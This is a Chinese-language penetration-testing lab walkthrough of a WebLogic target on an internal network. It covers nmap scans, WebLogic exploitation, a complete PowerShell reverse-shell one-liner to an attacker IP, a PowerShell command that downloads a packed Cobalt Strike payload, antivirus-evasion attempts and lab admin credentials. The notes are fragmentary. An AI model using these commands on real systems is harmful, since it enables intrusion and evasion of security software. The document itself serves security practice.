环境搭建
打开web虚拟机
用其他用户凭证登陆,密码过期修改密码就登陆成功了管理员账号密码:administrator/2wsx#EDC
de1ay/1qaz@WSX
管理员身份打开
C:\Oracle\Middleware\user_projects\domains\base_domain\bin\starWebLogic
nmap扫描
主机发现
nmap -sn -o hosts 192.168.111.0/24
看到 192.168.111.201
和 192.168.111.80
为新增加的 ip
端口发现
nmap -sT --min-rate 10000 -p- 192.168.111.80 -o 80_ports
192.168.111.80
发现有weblogic7001端口
192.168.111.201
nmap -sT --min-rate 10000 -p- 192.168.111.201 -o 80_ports
web渗透
http://192.168.111.80:7001/console/login/LoginForm.jsp
查看weblogic默认登陆界面
反弹shell
使用狐狸工具箱中的工具
存在漏洞
反弹shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.111.128', 4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
成功反弹到 kali
执行命令 tasklist /svc,看到 360 的进程,应该是装了 360 杀毒软件
免杀
生成 cs 免杀木马
我们要对上线到 cs 的木马做免杀,用到 bypassAV 插件
GitHub - hack2fun/BypassAV: Cobalt Strike插件,用于快速生成免杀的可执行文件
在 cs 中导入它的 bypass.cna
文件
导入成功
用 bypassAV 生成免杀程序
多次生成发现生成不成功(放弃)
使用加壳,尝试
内网渗透
上线cs
kali 开启 python 的 web 服务
python3 -m http.server
获取的反弹 shell 中执行
powershell iex(new-object system.net.webclient).downloadfile('http://192.168.111.128:8000/artifact_x64_se.exe','c:\programdata\artifact_x64_se.exe')
将加壳后的exe文件上传到kali
上线cs
在kali上运行exe文件
成功上线cs
提权操作
横向渗透
域控发现
开发445端口